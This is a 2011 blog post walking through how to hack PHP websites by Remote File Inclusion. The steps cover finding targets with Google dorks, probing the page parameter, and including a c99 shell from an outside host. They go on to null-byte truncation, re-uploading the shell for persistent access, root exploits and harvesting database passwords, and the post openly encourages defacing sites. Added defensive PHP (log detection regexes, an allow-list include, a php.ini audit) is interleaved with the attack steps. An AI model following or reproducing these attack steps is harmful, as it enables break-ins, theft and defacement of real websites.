Tuesday, 12 April 2011

How to hack websites by Remote File Inclusion

Hello friends, in my previous articles about website hacking, I have discussed different ways to hack websites and also explained website hacking using SQL injection in detail. Today I am going to explain an advanced method of hacking websites: how to hack websites using Remote File Inclusion. As the name suggests, Remote File Inclusion is a technique where we insert a file (in hacking terminology called a shell) into the website and get admin rights. Let's discuss this type of website hacking technique in detail, so friends, read on...

[Image: Remote File Inclusion : Website hacking Method]

What is Remote File Inclusion?
Remote File Inclusion is a method of hacking websites and getting admin rights on the server by inserting a remote file, usually called a SHELL (a shell is a graphical user interface file which is used for browsing the remote files and running your own code on the web server), into a website. Its inclusion allows the hacker to execute server-side commands as the currently logged-on user and to access all the server's files. With these rights we can go on to use local exploits to escalate our privileges and get control over the whole server.
Note: Remote File Inclusion (RFI) is the best ever technique to hack websites, and more than 60% of websites on the internet using PHP are vulnerable to this attack.

Which websites are vulnerable to a Remote File Inclusion attack?
The first and most basic question that arises in the mind of new hackers is: how can we find websites that are prone to a remote file inclusion attack, and what are the basic vulnerabilities in a website that we will target to hack the website and its web server? The answer to these questions is quite simple.
Many web servers are vulnerable to this type of attack because of PHP's default settings of register_globals and allow_url_fopen being enabled.
Note: In PHP 6.0, register_globals has been removed, but the second vulnerability still remains open, so we can give it a try on websites running the latest PHP version too. The good news for hackers is that around 90% of websites on the internet still use old versions of PHP, and of those 90%, more than 60% have the default settings enabled. That means we can hack most of the websites and deface them. Isn't that cool? But as I have said, we are ethical hackers; we only find vulnerabilities in the websites.


Now let's start the step by step Remote File Inclusion method to hack websites:
Step 1: Finding the Vulnerable Websites
First of all we have to find a website that loads its pages using the PHP include() function and is vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google dorks. Google dorks are simply search queries that are used to narrow the results down to a specific kind of page.
Download the list of Dorks for RFI : CLICK HERE

I have already listed a lot of GOOGLE DORKS in my previous post on hacking websites, so you can look at them here:
How to deface websites using SQL injection.


Step 2: Identifying a Vulnerable Website

Websites that have a page navigation system similar to the one mentioned below:

http://target-site.com/index.php?page=PageName


Step 3: Checking Whether the Website is Vulnerable or Not
To check if the website is vulnerable to a remote file inclusion attack, we try to include a website link instead of PageName, as shown below:

http://target-site.com/index.php?page=http://google.com


Now if the Google home page opens, it is confirmed that the website is vulnerable to a Remote File Inclusion attack and we will continue our attack. If the Google home page doesn't open, we will try another website.


Step 4: Remote Inclusion of Shells
Now we know that the website is hackable, so we will include a shell into the website. There are a number of shells available online, but my favourites are C99 and r57 because of their extended functionality and features.
There is no need to download these shells onto your system or PC; we can directly use the online copies, but if you wish you can download them from their respective websites. I will not provide them here because it's unethical, but Google them and you can find them easily.
To find a shell, the hacker would search Google for:

inurl:c99.txt

This will display many websites with the shell already up and ready to be included.
Note: you must include a ? after the URL of the shell, so that if anything comes after c99.txt it will be passed to the shell and not cause any problems.

For future analysis you can download these shells from here:

http://www.localroot.net/


The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?


Step 5: Adding a Null Byte
Sometimes the PHP script on the server appends “.php” to the end of every included file name. So if you included the shell, the path would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte to the end of c99.txt. This tells the server to ignore everything after c99.txt.


Step 6: Vulnerability Databases
In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFI. An example of a Google dork would be:

allinurl:.php?page=

This looks for URLs with .php?page= in them. This is only an example and you most likely won't find any vulnerable sites with that search. You can try switching the word “page” with other letters and similar words.

Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in content management systems, and then search for websites running that vulnerable web application with a Google dork.

Step 7: If the Attack is Successful
If we succeed in getting the server to parse the shell, we will see a screen similar to the following:

[Image: Hacking Website using Shell RFI attack]

The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell again, but this time as a .php file, so that in case the vulnerability is fixed, we will still be able to access it later on.


Step 8: Getting Root Privileges on the Server
Now we would next find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server; you can find a list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the time contain usernames and passwords for the MySQL databases and such.
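Every step above leaves a trace in the web server's access log, and that is where a site owner catches this. The script below is an added example (my own, not code from the original post): it scans access-log lines for the three indicators the steps describe, a page parameter whose value is itself a URL (Step 3), a remote .txt file followed by a bare ? (Step 4), and a URL-encoded null byte, %00, at the end of the value (Step 5). The log lines are constructed samples in Apache combined format, and the function and constant names are my own.

```php
<?php
// Added example, not part of the original post: flag access-log lines that
// look like the RFI probes described in Steps 3 to 5. Sample lines below are
// constructed; RFI_CHECKS, classify_request() and scan_log() are hypothetical names.

// Each indicator is a regex over the raw log line, keyed by a human-readable reason.
const RFI_CHECKS = [
    // Step 3: the value of a query parameter is itself a URL (plain or %-encoded "://").
    'remote URL in query parameter' =>
        '~[?&][A-Za-z0-9_]+=(?:https?|ftp)(?::|%3[Aa])(?:/|%2[Ff]){2}~i',
    // Step 4: a remote .txt file with a bare "?" right after it, so the rest of
    // the original path is swallowed as the included file's query string.
    'remote .txt include with trailing ?' =>
        '~\.txt\?(?:\s|$|")~i',
    // Step 5: URL-encoded null byte, used to cut off a ".php" the script appends.
    'null byte (%00) in request' =>
        '~%00~',
];

// Return the list of reasons a single log line matches; empty array if clean.
function classify_request(string $line): array
{
    $hits = [];
    foreach (RFI_CHECKS as $reason => $pattern) {
        if (preg_match($pattern, $line) === 1) {
            $hits[] = $reason;
        }
    }
    return $hits;
}

// Scan a list of log lines and collect every line with at least one hit.
function scan_log(array $lines): array
{
    $alerts = [];
    foreach ($lines as $index => $line) {
        $hits = classify_request($line);
        if ($hits !== []) {
            $alerts[] = ['line' => $index + 1, 'reasons' => $hits, 'request' => $line];
        }
    }
    return $alerts;
}

// Constructed sample traffic: one normal request, then the probe sequence from
// Steps 3, 4 and 5 against the index.php?page= pattern, then another normal request.
$sample = [
    '203.0.113.5 - - [12/Apr/2011:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '203.0.113.5 - - [12/Apr/2011:10:01:09 +0000] "GET /index.php?page=http://google.com HTTP/1.1" 200 41231',
    '203.0.113.5 - - [12/Apr/2011:10:01:15 +0000] "GET /index.php?page=http://site.com/c99.txt? HTTP/1.1" 200 88012',
    '203.0.113.5 - - [12/Apr/2011:10:01:21 +0000] "GET /index.php?page=http://site.com/c99.txt%00 HTTP/1.1" 200 88012',
    '198.51.100.7 - - [12/Apr/2011:10:02:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 3311',
];

foreach (scan_log($sample) as $alert) {
    printf("line %d: %s\n    %s\n", $alert['line'], implode('; ', $alert['reasons']), $alert['request']);
}
```

Run against the sample, lines 2, 3 and 4 are reported and lines 1 and 5 are not. Two things worth noting when using this on real logs: the Step 3 probe is worth alerting on even when the server refuses remote includes, because a harmless URL in the parameter is exactly how someone tests before sending a shell; and a 200 status on the probe line (as in the samples) is the strongest sign that the include actually went through.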

That's all about the way to hack websites using the remote file inclusion method. I hope you all have liked it. And I am sure you all have a lot of questions regarding this, so don't hesitate and ask in the form of comments. I will try to clear all your queries.


How to Protect your Websites and Forums from a Remote File Inclusion attack?
As we are ethical hackers, I will also explain for webmasters how to protect their websites from an RFI attack.
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure your server's php.ini file has register_globals and allow_url_fopen disabled.
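To make the fix concrete, here is an added example (my own, not code from the original post) that serves both this section and the "Which websites are vulnerable" section above: the include() pattern that Step 2's index.php?page= URLs come from, in its vulnerable form and in a hardened form where the request value is only a key into a fixed allow-list, followed by a runtime audit of the php.ini settings. One detail to know when checking a php.ini: since PHP 5.2 the directive that governs include() of URLs is allow_url_include (off by default), separate from allow_url_fopen, so the audit checks both. The function names, the PAGES allow-list and the pages/ directory are assumptions; the type declarations need PHP 7.1 or later.

```php
<?php
// Added example, not from the original post: the vulnerable include() pattern
// next to a hardened version, plus an audit of the relevant php.ini directives.
// vulnerable_render(), safe_render(), audit_php_config(), PAGES and the
// pages/ directory are hypothetical names used only for illustration.

// VULNERABLE: the query-string value becomes the include path. With
// allow_url_include enabled, a URL in ?page= is fetched and executed; with it
// disabled, the same code still lets a request pick arbitrary local files.
function vulnerable_render(string $page): void
{
    // The appended ".php" is the detail Step 5 talks about: on PHP older than
    // 5.3.4 a null byte in $page cut the path off before the suffix; since
    // 5.3.4 include() rejects any path containing a null byte.
    include($page . '.php');
}

// HARDENED: the request value is never used as a path, only as a key into a
// developer-controlled map, so nothing outside this list can ever be included.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function safe_render(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include __DIR__ . '/' . PAGES[$page];
}

// Defence in depth: the interpreter itself should refuse remote includes even
// if application code slips. These directives are PHP_INI_SYSTEM, i.e. settable
// only in php.ini, so a script can audit them but not change them at runtime.
function audit_php_config(): array
{
    $findings = [];
    // Governs include()/require() of URLs; introduced in PHP 5.2, default Off.
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_include is On: include() will fetch and run remote URLs';
    }
    // Governs fopen()/file_get_contents() of URLs; the setting the post names.
    if (filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'allow_url_fopen is On: disable it unless some code needs remote streams';
    }
    // Turned request parameters into PHP variables; removed in PHP 5.4, so on
    // current builds ini_get() returns false here and this check is a no-op.
    if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
        $findings[] = 'register_globals is On: request parameters become PHP variables';
    }
    return $findings;
}

// Entry point: serve the requested page through the hardened path and log any
// weak interpreter settings to the error log for the administrator.
$page = $_GET['page'] ?? 'home';
safe_render($page);
foreach (audit_php_config() as $finding) {
    error_log('[php-config] ' . $finding);
}
```

The allow-list is the part that actually closes the hole: disabling allow_url_include stops remote inclusion, but only the map stops a request from steering include() at local files it was never meant to load. vulnerable_render() is kept here purely for comparison and is never called.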

Note: Website hacking is illegal, this article is for Educational purposes only.

Thanks for reading.. Enjoy and have Happy Hacking..:)
